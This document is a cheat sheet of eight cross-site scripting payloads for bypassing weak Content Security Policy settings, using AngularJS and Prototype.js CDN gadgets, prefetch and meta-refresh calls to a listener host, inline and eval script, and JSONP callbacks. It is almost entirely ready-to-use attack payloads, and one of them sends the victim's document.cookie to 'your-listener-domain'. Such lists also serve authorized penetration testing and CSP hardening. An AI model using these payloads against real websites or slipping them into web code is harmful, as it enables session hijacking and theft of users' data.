# XSS CSP(content security policy) Bypass Payloads

# Purpose:
# These payloads demonstrate techniques to bypass weak or misconfigured
# Content Security Policy (CSP) protections.

⚠️ Use only in authorized testing environments.

----------------------------------------
1. AngularJS CSP Bypass
Payload:
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.5.8/angular.js"></script>
<div ng-app>
<input ng-focus=$event.view.alert(1)>
</div>
Description: Uses AngularJS sandbox to execute JS.
Use Case: When external scripts (CDN) are allowed in CSP.

----------------------------------------
2. Prototype.js Abuse
Payload:
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
<script>alert(1)</script>
Description: Loads trusted library then executes JS.
Use Case: When CDN sources are whitelisted.

----------------------------------------
3. Link Prefetch
Payload: <link rel="prefetch" href="http://your-listener-domain">
Description: Forces browser to request external resource.
Use Case: Data exfiltration or blind interaction.

----------------------------------------
4. Meta Refresh Redirect
Payload: <meta http-equiv="refresh" content="0; url=http://your-listener-domain">
Description: Redirects user automatically.
Use Case: Used when scripts are blocked but meta tags allowed.

----------------------------------------
5. JavaScript Redirect
Payload:
<script>
location.href = "http://your-listener-domain?c=" + document.cookie;
</script>
Description: Redirects with data in URL.
Use Case: Works when inline scripts are allowed.

----------------------------------------
6. Unsafe Inline Allowed
Payload: <script>alert(1)</script>
Description: Direct script execution.
Use Case: When CSP allows 'unsafe-inline'.

----------------------------------------
7. Unsafe Eval Allowed
Payload: <script>eval('alert(1)')</script>
Description: Executes dynamic JavaScript.
Use Case: When CSP allows 'unsafe-eval'.

----------------------------------------
8. JSONP Callback Abuse
Payload: <script src="/api/jsonp?callback=alert(1)"></script>
Description: Executes JS via JSONP endpoint.
Use Case: Exploits trusted API endpoints.

----------------------------------------